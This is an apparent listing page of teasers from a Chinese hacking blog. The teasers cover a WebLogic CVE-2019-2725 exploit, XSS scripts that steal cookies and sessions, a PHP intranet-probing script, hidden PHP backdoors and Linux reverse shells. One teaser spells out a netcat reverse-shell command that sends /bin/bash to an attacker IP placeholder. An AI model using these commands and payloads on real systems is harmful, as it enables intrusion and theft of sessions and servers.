颓废's Blog Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725) 利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过 11月21日 32 views 发表评论 阅读全文
moonsec_com INURLB,一款高级黑客搜索引擎工具 INURLB是一款基于PHP的黑客高级搜索引擎,其支持24个搜索引擎,拥有6个深度web或者特殊选项。这些对于渗透测试 的信息收集和漏洞评估,有着十分重要的意义。 11月21日 33 views 发表评论 阅读全文
moonsec_com xss一些小脚本 xxx.1 xss 配合php获取cookie和session的脚本 <script>document.write('&... 11月21日 20 views 发表评论 阅读全文
moonsec_com php内网探测脚本&简单代理访问 <?php $url = isset($_REQUEST)?$_REQUEST:null; $ip = isset($_REQUEST)?$_REQUEST:null; if($url != n... 11月21日 16 views 发表评论 阅读全文
moonsec_com phpcms v9如何设置后台某IP段可以登陆? 用phpcms v9做开发的时候,有时候不想让别人在某IP登陆,可以再代码里面修改一下设置只有某IP段下才可以登陆,怎么办呢?这样做很安全的,直接上代码吧,你找到models/ad... 11月21日 16 views 发表评论 阅读全文
moonsec_com linux下反弹Shell的五种方法 1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p;... 11月21日 15 views 发表评论 阅读全文
moonsec_com 记一次发现利用preg_replace隐藏后门和后续探究 [转] php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码。 事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小... 11月21日 11 views 发表评论 阅读全文
moonsec_com 黑客是怎样入侵你的网站的 感谢ppsbb 投递 这个问题很难回答,简单的来说,入侵一个网站可以有很多种方法。本文的目的是展示黑客们常用的扫描和入侵网站的技术。 假设你的站点是:hack-test.com 11月21日 18 views 发表评论 阅读全文